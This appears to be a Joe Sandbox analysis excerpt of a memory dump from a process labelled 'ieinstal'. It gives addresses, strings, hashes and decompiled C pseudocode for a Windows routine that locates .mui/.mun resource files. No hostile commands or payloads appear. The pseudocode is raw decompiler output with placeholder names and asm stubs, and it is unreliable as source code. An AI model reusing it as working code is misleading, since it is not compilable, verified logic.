0x1f0256c8
0x00000000
0x1efd1064
0x1f025520
0x1efd1039
0x1f025542
0x1f025545
0x00000000
0x00000000
0x1f02554b
0x1f025551
0x00000000
0x00000000
0x1f025557
0x1f025559
0x1f02556a
0x1f02556c
0x1f02556d
0x1f025573
0x1f025579
0x1f025579
0x00000000
0x1f025573
0x1f02555d
0x1f025562
0x1f025564
0x00000000
0x00000000
0x00000000
0x1f025564
0x00000000
0x1efd1039
0x1efd100c
0x1efd100c
0x1efd1012
0x1f0254ba
0x1f0254bd
0x1f0254cc
0x1f0254d0
0x1f0254d0
0x1f0254bd
0x00000000

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 1F02569C
HEAP: , xrefs: 1F025691
@, xrefs: 1F025860
HEAP[%wZ]: , xrefs: 1F025684

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 2994545307-3570731704
Opcode ID: 5a984c66bff732d933428bbb8ee97c80f193e1a81262025bfaaa6524b00bcb9e
Instruction ID: e598cdd4574de60fe6bdc2f4f64040e37a5987859e53ba997de8824142e17f58
Opcode Fuzzy Hash: 5a984c66bff732d933428bbb8ee97c80f193e1a81262025bfaaa6524b00bcb9e
Instruction Fuzzy Hash: AA925B75A01369CFEB24DF14C860B99BBF6BF84310F1582EAD949A7250D731AE84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1EFCBDE0 Relevance: 5.7, Strings: 4, Instructions: 694
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1EFCBDE0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, signed short _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				void* _v4;
				intOrPtr _v16;
				char _v20;
				char _v736;
				char _v796;
				char _v1504;
				char _v1680;
				char _v2384;
				char _v2640;
				char* _v2644;
				char _v2648;
				int _v2652;
				char _v2653;
				char _v2654;
				void* _v2660;
				short _v2662;
				char _v2664;
				intOrPtr _v2668;
				int _v2672;
				char _v2676;
				int _v2684;
				char _v2688;
				char* _v2692;
				short _v2694;
				char _v2696;
				int _v2700;
				void* _v2704;
				char _v2708;
				intOrPtr* _v2712;
				signed int _v2716;
				signed int _v2720;
				short _v2722;
				char _v2724;
				signed int _v2728;
				int _v2732;
				int _v2736;
				signed int _v2740;
				char _v2744;
				int _v2748;
				int _v2752;
				int _v2756;
				void* _v2760;
				intOrPtr _v2768;
				signed int _v2772;
				int _v2780;
				char _v2784;
				char* _v2788;
				char _v2792;
				char _v2800;
				void _v2828;
				char _v2832;
				char _v2836;
				intOrPtr _t299;
				signed int _t300;
				intOrPtr _t301;
				signed int _t302;
				int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t317;
				signed int _t320;
				signed char* _t323;
				signed int _t324;
				signed char* _t325;
				signed int _t334;
				signed int _t336;
				intOrPtr _t337;
				signed int _t338;
				signed int _t340;
				signed int _t350;
				char* _t356;
				int _t369;
				signed int _t373;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t397;
				signed int _t398;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				char* _t410;
				int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t438;
				signed int _t445;
				intOrPtr _t455;
				signed int _t457;
				intOrPtr _t462;
				signed int _t467;
				intOrPtr _t469;
				signed int _t475;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t489;
				signed int _t490;
				signed int _t492;
				intOrPtr* _t493;
				intOrPtr* _t502;
				signed int _t505;
				short _t515;
				void* _t520;
				void* _t527;
				intOrPtr* _t533;
				signed int _t535;
				signed int _t538;
				intOrPtr* _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				intOrPtr _t551;
				signed int _t553;
				void* _t554;

				_push(0xb04);
				_push(0x1f09bfd0);
				E1F017C40(__ebx, __edi, __esi);
				_v2668 = _a8;
				_v2728 = _a12 & 0x0000ffff;
				_v2712 = _a16;
				_v2740 = _a20;
				_v2708 = 0;
				_v2752 = 0;
				_t543 = 0;
				_v2704 = 0;
				_v2700 = 0;
				_v2736 = 0;
				_v2676 = 0;
				_v2760 = 0;
				_v2654 = 0;
				_v2836 = 0x24;
				_v2832 = 1;
				_t457 = 7;
				memset( &_v2828, 0, _t457 << 2);
				_v2688 = 0;
				_v2756 = 0;
				_v2732 = 0;
				_v2653 = 1;
				_v2748 = 0;
				_v2716 =  &_v2384;
				_v2744 = 0x2be;
				_v2768 = 1;
				_v2684 = 1;
				_t299 = _v2668;
				if(_t299 == 0) {
					L140:
					_t300 = 0xc000000d;
					goto L8;
				} else {
					_t461 = _v2728;
					if(_v2728 == 0) {
						goto L140;
					} else {
						_t533 = _v2712;
						if(_t533 == 0) {
							goto L140;
						} else {
							_t462 = _t299;
							_t301 = E1EFCD530(_t462, _t461,  &_v2676, 4);
							if(_t301 == 0xffffffff) {
								_t535 = _a24 & 0x00400000;
								__eflags = _t535;
								if(_t535 != 0) {
									goto L10;
								} else {
									 *_v2712 = 0;
									_t300 = 0xc00b0006;
									goto L8;
								}
							} else {
								if(_t301 == 0) {
									_t535 = _a24 & 0x00400000;
									__eflags = _t535;
									L10:
									_v2772 = _t535;
									_v2672 = 0;
									__eflags = _t535;
									if(_t535 != 0) {
										_t302 = 0xc0000039;
									} else {
										_t462 = _v2668;
										_t302 = E1EFC8F1E(_t462,  &_v736, _t462,  &_v2752,  &_v2704,  &_v2700,  &_v2748);
										_t543 = _v2704;
									}
									__eflags = _t302;
									if(_t302 < 0) {
										_t462 = _v2668;
										_t545 = E1F04F85C(_t462,  &_v736, 0x2be,  &_v2752,  &_v2732,  &_v2700,  &_v2688);
										_v2652 = _t545;
										__eflags = _t545;
										if(_t545 < 0) {
											goto L39;
										} else {
											_t543 = _v2732;
											_v2704 = _t543;
											goto L13;
										}
									} else {
										L13:
										_t334 = _v2752 & 0xfffffffe;
										__eflags = _t334 - 0x2be;
										if(_t334 >= 0x2be) {
											E1F004C68();
											_push(_t554);
											_push(0);
											_push(_t543);
											_push(_t535);
											_t455 = _t462;
											_t336 = E1EFE0130();
											__eflags = _t336;
											if(_t336 != 0) {
												_t469 =  *0x1f0b9374; // 0x77130000
												__eflags = _t455 - _t469;
												if(_t455 >= _t469) {
													_t337 =  *0x1f0b9378; // 0x1a3000
													_t336 = _t337 + _t469;
													__eflags = _t455 - _t336;
													if(_t455 >= _t336) {
														goto L103;
													} else {
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L104;
													}
													goto L141;
												} else {
													L103:
													_t336 = E1EFCD700(_t455,  &_v20);
												}
												L104:
												__eflags = _v16 - _t455;
												if(_v16 != _t455) {
													_push(0x18);
													asm("int 0x29");
												}
											}
											return _t336;
										} else {
											 *((short*)(_t554 + _t334 - 0x2e0)) = 0;
											_t338 = E1F00A910(_t543, 0x7e);
											_pop(_t474);
											__eflags = _t338;
											if(_t338 != 0) {
												_t474 =  &_v736;
												_t340 = E1F04F42F( &_v736, _t543,  &_v2756);
												__eflags = _t340;
												if(_t340 >= 0) {
													_t543 = _v2756;
													_v2704 = _t543;
													_t502 = _t543;
													_t527 = _t502 + 2;
													do {
														_t445 =  *_t502;
														_t502 = _t502 + 2;
														__eflags = _t445;
													} while (_t445 != 0);
													_t474 = _t502 - _t527 >> 1;
													_v2700 = (_t502 - _t527 >> 1) + (_t502 - _t527 >> 1);
												}
												goto L15;
												L42:
												__eflags = _t308;
												if(_t308 != 0) {
													_push(_v2676);
													_push(_t545);
													asm("sbb edi, edi");
													_t538 = ( ~_t535 & 0x00000020) + 1;
													__eflags = _t538;
													_push(_t538);
													_push(_v2728);
													_push(0);
													_push( &_v2708);
													E1EFC93A6(0, _v2668,  &_v2672, _t538, _t545, _t538);
												}
												__eflags = _v2672 - 0xffffffff;
												if(_v2672 == 0xffffffff) {
													 *_v2712 = 0;
												} else {
													_t320 = E1EFD3C40();
													__eflags = _t320;
													if(_t320 != 0) {
														_t323 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													} else {
														_t323 = 0x7ffe0385;
													}
													__eflags =  *_t323 & 0x00000001;
													if(( *_t323 & 0x00000001) != 0) {
														_t324 = E1EFD3C40();
														__eflags = _t324;
														if(_t324 == 0) {
															_t325 = 0x7ffe0384;
														} else {
															_t325 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
														}
														E1F04FC01( &_v2664,  *_t325 & 0x000000ff);
													}
													_v4 = 2;
													 *_v2712 = _v2672;
													_t467 = _v2740;
													__eflags = _t467;
													if(_t467 != 0) {
														 *_t467 = _v2676;
													}
													_t547 = 0;
													_v2652 = 0;
													_v4 = 0xfffffffe;
												}
												__eflags = _v2732;
												if(_v2732 != 0) {
													E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v2732);
												}
												_t311 = _v2756;
												__eflags = _t311;
												if(_t311 != 0) {
													E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t311);
													_t547 = _v2652;
												}
												_t314 = _v2736;
												__eflags = _t314;
												if(_t314 != 0) {
													E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t314);
													_t547 = _v2652;
												}
												_t317 = _v2716;
												__eflags = _t317;
												if(_t317 != 0) {
													__eflags =  &_v2384 - _t317;
													if( &_v2384 != _t317) {
														E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t317);
														_t547 = _v2652;
													}
												}
												_t300 = _t547;
												goto L8;
											}
											L15:
											E1F005050(_t474,  &_v2724, 0);
											E1F005050(_t474,  &_v2696, 0);
											_v2788 =  &_v1504;
											_v2792 = 0x2be0000;
											_v2780 = 0;
											_v2784 = 0;
											_t475 = _v2700;
											_t515 = 0x3c;
											__eflags = _t475 + 0xc - _t515;
											if(_t475 + 0xc > _t515) {
												_t350 = E1EFD5D90(_t475,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xa + _t475 * 2);
												_v2736 = _t350;
												__eflags = _t350;
												if(_t350 == 0) {
													_t545 = 0xc0000017;
													goto L130;
												} else {
													_v2720 = _t350;
													_v2722 = 0xa + _v2700 * 2;
													_t543 = _v2704;
													goto L17;
												}
											} else {
												_v2720 =  &_v796;
												_v2722 = _t515;
												L17:
												_v2724 = 0;
												_t545 = E1EFCFE40(_t475,  &_v2724, _t543);
												_v2652 = _t545;
												__eflags = _t545;
												if(_t545 >= 0) {
													__eflags = _a24 & 0x01000000;
													_t356 = L".mun";
													if((_a24 & 0x01000000) == 0) {
														_t356 = L".mui";
													}
													_t545 = E1EFCFE40(_t475,  &_v2724, _t356);
													_v2652 = _t545;
													__eflags = _t545;
													if(_t545 >= 0) {
														_t359 = _v2748;
														__eflags = _v2748;
														if(__eflags != 0) {
															E1EFDDC40( &_v2836, _t359);
														}
														_v4 = 1;
														_v2652 = _t545;
														_push( &_v2760);
														_push( &_v2784);
														_push( &_v2792);
														_t517 = _v2728;
														_t550 = E1EFC9046(0,  &_v2724, _v2728, _t535, _t545, __eflags);
														_v2652 = _t550;
														_v4 = 0xfffffffe;
														E1EFCC617(_t364);
														__eflags = _t550;
														if(_t550 >= 0) {
															_v2654 = 1;
															_t478 = _v2760;
															_v2660 =  *((intOrPtr*)(_t478 + 4));
															_v2664 =  *_t478;
															_v2662 =  *((intOrPtr*)(_t478 + 2));
														}
														__eflags = _v2654;
														if(_v2654 != 0) {
															_v2692 = 0;
															_t369 = 0;
															_v2684 = 0;
															goto L34;
														} else {
															_v2660 =  &_v1504;
															_v2664 = 0x2be0000;
															_t553 = _a24 & 0x01000000;
															__eflags = _t553;
															if(_t553 != 0) {
																_t493 =  &_v736;
																_t517 = _t493 + 2;
																do {
																	_t405 =  *_t493;
																	_t493 = _t493 + 2;
																	__eflags = _t405;
																} while (_t405 != 0);
																_t406 = _t554 + (_t493 - _t517 >> 1) * 2 - 0x2e4;
																while(1) {
																	__eflags = _t406 -  &_v736;
																	if(_t406 <=  &_v736) {
																		break;
																	}
																	__eflags =  *_t406 - 0x5c;
																	if( *_t406 != 0x5c) {
																		_t406 = _t406 - 2;
																		__eflags = _t406;
																		continue;
																	}
																	break;
																}
																__eflags = _t406 -  &_v736;
																if(_t406 <=  &_v736) {
																	_t545 = 0xc000008a;
																	goto L130;
																} else {
																	_t478 = 0;
																	 *((short*)(_t406 + 2)) = 0;
																	E1EFCFE40(0,  &_v2664,  &_v736);
																	_t410 = L"SystemResources\\";
																	goto L26;
																}
															} else {
																_t410 =  &_v736;
																L26:
																E1EFCFE40(_t478,  &_v2664, _t410);
																__eflags = _t553;
																if(_t553 != 0) {
																	L29:
																	E1EFCFE40(_t478,  &_v2664, _v2720);
																	__eflags = _t553;
																	if(_t553 != 0) {
																		L33:
																		_t369 = _v2684;
																		L34:
																		_t545 = E1EFC91E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _t369,  &_v2708,  &_v2676,  &_v2672);
																		_v2652 = _t545;
																		__eflags = _t545 - 0xc0000034;
																		if(_t545 == 0xc0000034) {
																			L59:
																			_v2644 =  &_v2640;
																			_v2648 = 0x1000000;
																			_v2640 = 0;
																			_t373 = E1EFDC7E7( &_v2648,  &_v2664);
																			__eflags = _t373;
																			if(_t373 >= 0) {
																				E1EFCFCF0( &_v2648,  &_v2648);
																				_t397 =  *[fs:0x18];
																				_t489 =  *(_t397 + 0xfdc);
																				__eflags = _t489;
																				if(_t489 < 0) {
																					_t397 = _t397 + _t489;
																					__eflags = _t397;
																				}
																				__eflags = _t397 -  *((intOrPtr*)(_t397 + 0x18));
																				if(_t397 !=  *((intOrPtr*)(_t397 + 0x18))) {
																					_t551 =  *((intOrPtr*)(_t397 + 0x14c0));
																				} else {
																					_t551 =  *((intOrPtr*)(_t397 + 0xe30));
																				}
																				_t398 =  *[fs:0x18];
																				_t490 =  *(_t398 + 0xfdc);
																				__eflags = _t490;
																				if(_t490 < 0) {
																					_t398 = _t398 + _t490;
																					__eflags = _t398;
																				}
																				__eflags = _t398 -  *((intOrPtr*)(_t398 + 0x18));
																				if(_t398 !=  *((intOrPtr*)(_t398 + 0x18))) {
																					 *((intOrPtr*)(_t398 + 0x14c0)) = 1;
																					 *((intOrPtr*)(_t398 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t398 + 0xe30)) = 1;
																				}
																				_v2652 = E1EFC91E5(_v2668,  &_v2648, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																				_t403 =  *[fs:0x18];
																				_t492 =  *(_t403 + 0xfdc);
																				__eflags = _t492;
																				if(_t492 < 0) {
																					_t403 = _t403 + _t492;
																					__eflags = _t403;
																				}
																				__eflags = _t403 -  *((intOrPtr*)(_t403 + 0x18));
																				if(_t403 !=  *((intOrPtr*)(_t403 + 0x18))) {
																					 *((intOrPtr*)(_t403 + 0x14c0)) = _t551;
																					 *((intOrPtr*)(_t403 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t403 + 0xe30)) = _t551;
																				}
																				_t545 = _v2652;
																			}
																			__eflags =  &_v2640 - _v2644;
																			if( &_v2640 != _v2644) {
																				E1EFBBA80(_v2644);
																			}
																		} else {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				goto L59;
																			}
																		}
																		__eflags = _a24 & 0x01000000;
																		if((_a24 & 0x01000000) == 0) {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				L81:
																				_t376 = E1EFF7D8F( &_v736,  &_v1504);
																				__eflags = _t376;
																				if(_t376 != 0) {
																					_t377 =  &_v1504;
																					_v2660 = _t377;
																					_t485 = _t377;
																					_t520 = _t485 + 2;
																					do {
																						_t378 =  *_t485;
																						_t485 = _t485 + 2;
																						__eflags = _t378;
																					} while (_t378 != 0);
																					_t486 = _t485 - _t520;
																					__eflags = _t486;
																					_t487 = _t486 >> 1;
																					_v2664 = (_t486 >> 1) + (_t486 >> 1);
																					_v2662 = 0x2be;
																					E1EFCFE40(_t486 >> 1,  &_v2664, "\\");
																					E1EFE10D0(_t487,  &_v2664,  &_v2696);
																					E1EFCFE40(_t487,  &_v2664, "\\");
																					E1EFCFE40(_t487,  &_v2664, _v2720);
																					_t545 = E1EFC91E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																					goto L130;
																				}
																			} else {
																				__eflags = _t545 - 0xc0000034;
																				if(_t545 == 0xc0000034) {
																					goto L81;
																				}
																			}
																		}
																	} else {
																		_t498 = _v2692;
																		_t417 = E1EFC8DBB(_v2692, _v2660,  &_v2744,  &_v2384);
																		_v2652 = _t417;
																		__eflags = _t417 - 0xc0000023;
																		if(_t417 == 0xc0000023) {
																			_t419 = E1EFD5D90(_t498,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v2744);
																			_v2716 = _t419;
																			__eflags = _t419;
																			if(_t419 == 0) {
																				goto L32;
																			} else {
																				_v2652 = E1EFC8DBB(_v2692, _v2660,  &_v2744, _t419);
																				goto L31;
																			}
																			goto L42;
																		} else {
																			L31:
																			_t419 = _v2716;
																		}
																		L32:
																		__eflags = _v2652;
																		if(_v2652 >= 0) {
																			_t421 = E1EFE1D10( &_v2800, _t419);
																			__eflags = _t421;
																			if(_t421 < 0) {
																				goto L33;
																			} else {
																				_t545 = E1EFC91E5(_v2668,  &_v2800, _v2688, _a24, _v2692, 2,  &_v2708,  &_v2676,  &_v2672);
																				_v2652 = _t545;
																				__eflags = _t545;
																				if(_t545 < 0) {
																					__eflags = _t545 - 0xc0000034;
																					if(__eflags != 0) {
																						E1F040961(_t545,  &_v2800, __eflags, _v2688, _a24,  &_v2696);
																					}
																					goto L33;
																				} else {
																					E1EFE1D10( &_v2664, _v2716);
																				}
																			}
																		} else {
																			goto L33;
																		}
																	}
																} else {
																	_v2692 =  &_v1680;
																	_v2694 = 0xaa;
																	_t438 = E1EFE5A40(_t517, _v2728 & 0x0000ffff,  &_v2696, 2, 0);
																	__eflags = _t438;
																	if(_t438 < 0) {
																		_t545 = 0xc000000d;
																		L130:
																		_v2652 = _t545;
																	} else {
																		E1EFE10D0(_t478,  &_v2664,  &_v2696);
																		E1EFCFE40(_t478,  &_v2664, "\\");
																		goto L29;
																	}
																}
															}
														}
													}
												}
											}
											L39:
											__eflags = _v2672;
											if(_v2672 == 0) {
												_v2672 = _v2672 | 0xffffffff;
											}
											__eflags = _t545;
											if(_t545 < 0) {
												__eflags = _t545 - 0xc000012d;
												if(_t545 == 0xc000012d) {
													L131:
													_t308 = 0;
												} else {
													__eflags = _t545 - 0xc00000a5;
													if(_t545 == 0xc00000a5) {
														goto L131;
													} else {
														__eflags = _t545 - 0xc0000017;
														if(_t545 != 0xc0000017) {
															goto L41;
														} else {
															goto L131;
														}
													}
												}
											} else {
												L41:
												_t308 = _v2653;
											}
											goto L42;
										}
									}
								} else {
									_v4 = 0;
									 *_t533 = _t301;
									_t505 = _v2740;
									if(_t505 != 0) {
										 *_t505 = _v2676;
									}
									_v2652 = 0;
									_v4 = 0xfffffffe;
									_t300 = 0;
									L8:
									 *[fs:0x0] = _v16;
									return _t300;
								}
							}
						}
					}
				}
				L141:
			}

0x1efcbde0
0x1efcbde5
0x1efcbdea
0x1efcbdf2
0x1efcbdfc
0x1efcbe05
0x1efcbe0e
0x1efcbe16
0x1efcbe1c
0x1efcbe22
0x1efcbe24
0x1efcbe2a
0x1efcbe30
0x1efcbe36
0x1efcbe3c
0x1efcbe42
0x1efcbe48
0x1efcbe55
0x1efcbe5d
0x1efcbe66
0x1efcbe68
0x1efcbe6e
0x1efcbe74
0x1efcbe7a
0x1efcbe80
0x1efcbe8c
0x1efcbe92
0x1efcbe9c
0x1efcbea2
0x1efcbea8
0x1efcbeb0
0x1f023cea
0x1f023cea
0x00000000
0x1efcbeb6
0x1efcbeb6
0x1efcbebf
0x00000000
0x1efcbec5
0x1efcbec5
0x1efcbecd
0x00000000
0x1efcbed3
0x1efcbede
0x1efcbee0
0x1efcbee8
0x1efcc33e
0x1efcc33e
0x1efcc344
0x00000000
0x1efcc34a
0x1efcc350
0x1efcc352
0x00000000
0x1efcc352
0x1efcbeee
0x1efcbef0
0x1efcbf2d
0x1efcbf2d
0x1efcbf33
0x1efcbf33
0x1efcbf39
0x1efcbf3f
0x1efcbf41
0x1f023974
0x1efcbf47
0x1efcbf6a
0x1efcbf70
0x1efcbf75
0x1efcbf75
0x1efcbf7b
0x1efcbf7d
0x1f0239a5
0x1f0239b0
0x1f0239b2
0x1f0239b8
0x1f0239ba
0x00000000
0x1f0239c0
0x1f0239c0
0x1f0239c6
0x00000000
0x1f0239c6
0x1efcbf83
0x1efcbf83
0x1efcbf89
0x1efcbf8c
0x1efcbf91
0x1efcc62e
0x1efcc635
0x1efcc63b
0x1efcc63c
0x1efcc63d
0x1efcc63e
0x1efcc640
0x1efcc645
0x1efcc647
0x1efcc649
0x1efcc64f
0x1efcc651
0x1efcc66c
0x1efcc671
0x1efcc673
0x1efcc675
0x00000000
0x1efcc677
0x1efcc67f
0x1efcc680
0x1efcc681
0x1efcc682
0x00000000
0x1efcc682
0x00000000
0x1efcc653
0x1efcc653
0x1efcc658
0x1efcc658
0x1efcc65d
0x1efcc65d
0x1efcc660
0x1efcc662
0x1efcc665
0x1efcc665
0x1efcc660
0x1efcc66b
0x1efcbf97
0x1efcbf99
0x1efcbfa4
0x1efcbfaa
0x1efcbfab
0x1efcbfad
0x1f0239da
0x1f0239e0
0x1f0239e5
0x1f0239e7
0x1f0239ed
0x1f0239f3
0x1f0239f9
0x1f0239fb
0x1f0239fe
0x1f0239fe
0x1f023a01
0x1f023a04
0x1f023a04
0x1f023a0b
0x1f023a10
0x1f023a10
0x00000000
0x1efcc262
0x1efcc262
0x1efcc264
0x1efcc266
0x1efcc26c
0x1efcc26f
0x1efcc274
0x1efcc274
0x1efcc275
0x1efcc276
0x1efcc27c
0x1efcc283
0x1efcc290
0x1efcc290
0x1efcc295
0x1efcc29c
0x1efcc4a0
0x1efcc2a2
0x1efcc2a2
0x1efcc2a7
0x1efcc2a9
0x1f023c2b
0x1efcc2af
0x1efcc2af
0x1efcc2af
0x1efcc2b4
0x1efcc2b7
0x1f023c35
0x1f023c3a
0x1f023c3c
0x1f023c4e
0x1f023c3e
0x1f023c47
0x1f023c47
0x1f023c5c
0x1f023c5c
0x1efcc2bd
0x1efcc2d0
0x1efcc2d2
0x1efcc2d8
0x1efcc2da
0x1efcc2e2
0x1efcc2e2
0x1efcc2e4
0x1efcc2e6
0x1efcc2ec
0x1efcc2ec
0x1efcc2f3
0x1efcc2fa
0x1f023ca4
0x1f023ca9
0x1efcc300
0x1efcc306
0x1efcc308
0x1f023cbf
0x1f023cc4
0x1f023cc4
0x1efcc30e
0x1efcc314
0x1efcc316
0x1efcc54d
0x1efcc552
0x1efcc552
0x1efcc31c
0x1efcc322
0x1efcc324
0x1efcc32c
0x1efcc32e
0x1f023cda
0x1f023cdf
0x1f023cdf
0x1efcc32e
0x1efcc334
0x00000000
0x1efcc334
0x1efcbfb3
0x1efcbfbb
0x1efcbfc8
0x1efcbfd3
0x1efcbfd9
0x1efcbfe3
0x1efcbfeb
0x1efcbff1
0x1efcbffc
0x1efcbffd
0x1efcbfff
0x1efcc50a
0x1efcc50f
0x1efcc515
0x1efcc517
0x1f023a1b
0x00000000
0x1efcc51d
0x1efcc51d
0x1efcc530
0x1efcc537
0x00000000
0x1efcc537
0x1efcc005
0x1efcc00b
0x1efcc011
0x1efcc018
0x1efcc01a
0x1efcc02e
0x1efcc030
0x1efcc036
0x1efcc038
0x1efcc03e
0x1efcc045
0x1efcc04a
0x1efcc04c
0x1efcc04c
0x1efcc05e
0x1efcc060
0x1efcc066
0x1efcc068
0x1efcc06e
0x1efcc074
0x1efcc076
0x1efcc5ca
0x1efcc5ca
0x1efcc07c
0x1efcc083
0x1efcc08f
0x1efcc096
0x1efcc09d
0x1efcc09e
0x1efcc0af
0x1efcc0b1
0x1efcc0b7
0x1efcc0be
0x1efcc0c3
0x1efcc0c5
0x1efcc5d4
0x1efcc5db
0x1efcc5e4
0x1efcc5ed
0x1efcc5f8
0x1efcc5f8
0x1efcc0cb
0x1efcc0d2
0x1efcc604
0x1efcc60a
0x1efcc60c
0x00000000
0x1efcc0d8
0x1efcc0de
0x1efcc0e4
0x1efcc0f1
0x1efcc0f1
0x1efcc0f7
0x1efcc55d
0x1efcc563
0x1efcc566
0x1efcc566
0x1efcc569
0x1efcc56c
0x1efcc56c
0x1efcc575
0x1efcc587
0x1efcc58d
0x1efcc58f
0x00000000
0x00000000
0x1efcc57e
0x1efcc582
0x1efcc584
0x1efcc584
0x00000000
0x1efcc584
0x00000000
0x1efcc582
0x1efcc597
0x1efcc599
0x1f023a4c
0x00000000
0x1efcc59f
0x1efcc59f
0x1efcc5a1
0x1efcc5b3
0x1efcc5b8
0x00000000
0x1efcc5b8
0x1efcc0fd
0x1efcc0fd
0x1efcc103
0x1efcc10b
0x1efcc110
0x1efcc112
0x1efcc171
0x1efcc17e
0x1efcc183
0x1efcc185
0x1efcc1ca
0x1efcc1ca
0x1efcc1d0
0x1efcc206
0x1efcc208
0x1efcc20e
0x1efcc214
0x1efcc35c
0x1efcc362
0x1efcc368
0x1efcc374
0x1efcc387
0x1efcc38c
0x1efcc38e
0x1efcc39b
0x1efcc3a0
0x1efcc3a6
0x1efcc3ac
0x1efcc3ae
0x1efcc3b0
0x1efcc3b0
0x1efcc3b0
0x1efcc3b2
0x1efcc3b5
0x1efcc4c6
0x1efcc3bb
0x1efcc3bb
0x1efcc3bb
0x1efcc3c1
0x1efcc3c7
0x1efcc3cd
0x1efcc3cf
0x1efcc3d1
0x1efcc3d1
0x1efcc3d1
0x1efcc3d3
0x1efcc3d6
0x1efcc4d1
0x1efcc4db
0x1efcc3dc
0x1efcc3dc
0x1efcc3dc
0x1efcc421
0x1efcc427
0x1efcc42d
0x1efcc433
0x1efcc435
0x1efcc437
0x1efcc437
0x1efcc437
0x1efcc439
0x1efcc43c
0x1efcc4e6
0x1efcc4ec
0x1efcc442
0x1efcc442
0x1efcc442
0x1efcc448
0x1efcc448
0x1efcc454
0x1efcc45a
0x1f023b4c
0x1f023b4c
0x1efcc21a
0x1efcc21a
0x1efcc220
0x00000000
0x00000000
0x1efcc220
0x1efcc226
0x1efcc22d
0x1efcc22f
0x1efcc235
0x1efcc4a7
0x1efcc4b4
0x1efcc4b9
0x1efcc4bb
0x1f023b56
0x1f023b5c
0x1f023b62
0x1f023b64
0x1f023b67
0x1f023b67
0x1f023b6a
0x1f023b6d
0x1f023b6d
0x1f023b72
0x1f023b72
0x1f023b74
0x1f023b79
0x1f023b85
0x1f023b98
0x1f023bab
0x1f023bbc
0x1f023bce
0x1f023c0e
0x00000000
0x1f023c0e
0x1efcc23b
0x1efcc23b
0x1efcc241
0x00000000
0x00000000
0x1efcc241
0x1efcc235
0x1efcc187
0x1efcc19b
0x1efcc1a1
0x1efcc1a6
0x1efcc1ac
0x1efcc1b1
0x1f023a71
0x1f023a76
0x1f023a7c
0x1f023a7e
0x00000000
0x1f023a84
0x1f023a9d
0x00000000
0x1f023a9d
0x00000000
0x1efcc1b7
0x1efcc1b7
0x1efcc1b7
0x1efcc1b7
0x1efcc1bd
0x1efcc1bd
0x1efcc1c4
0x1f023ab0
0x1f023ab5
0x1f023ab7
0x00000000
0x1f023abd
0x1f023af4
0x1f023af6
0x1f023afc
0x1f023afe
0x1f023b18
0x1f023b1e
0x1f023b3c
0x1f023b3c
0x00000000
0x1f023b00
0x1f023b0e
0x1f023b0e
0x1f023afe
0x00000000
0x00000000
0x00000000
0x1efcc1c4
0x1efcc114
0x1efcc11a
0x1efcc125
0x1efcc140
0x1efcc145
0x1efcc147
0x1f023a56
0x1f023c10
0x1f023c10
0x1efcc14d
0x1efcc15b
0x1efcc16c
0x00000000
0x1efcc16c
0x1efcc147
0x1efcc112
0x1efcc0f7
0x1efcc0d2
0x1efcc068
0x1efcc038
0x1efcc247
0x1efcc247
0x1efcc24e
0x1efcc465
0x1efcc465
0x1efcc254
0x1efcc256
0x1efcc471
0x1efcc477
0x1f023c1b
0x1f023c1b
0x1efcc47d
0x1efcc47d
0x1efcc483
0x00000000
0x1efcc489
0x1efcc489
0x1efcc48f
0x00000000
0x1efcc495
0x00000000
0x1efcc495
0x1efcc48f
0x1efcc483
0x1efcc25c
0x1efcc25c
0x1efcc25c
0x1efcc25c
0x00000000
0x1efcc256
0x1efcbf91
0x1efcbef2
0x1efcbef2
0x1efcbef5
0x1efcbef7
0x1efcbeff
0x1efcbf07
0x1efcbf07
0x1efcbf09
0x1efcbf0f
0x1efcbf16
0x1efcbf18
0x1efcbf1b
0x1efcbf27
0x1efcbf27
0x1efcbef0
0x1efcbee8
0x1efcbecd
0x1efcbebf
0x00000000

Strings

.mui, xrefs: 1EFCC04C, 1EFCC051
SystemResources\, xrefs: 1EFCC5B8
$, xrefs: 1EFCBE48
.mun, xrefs: 1EFCC045

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

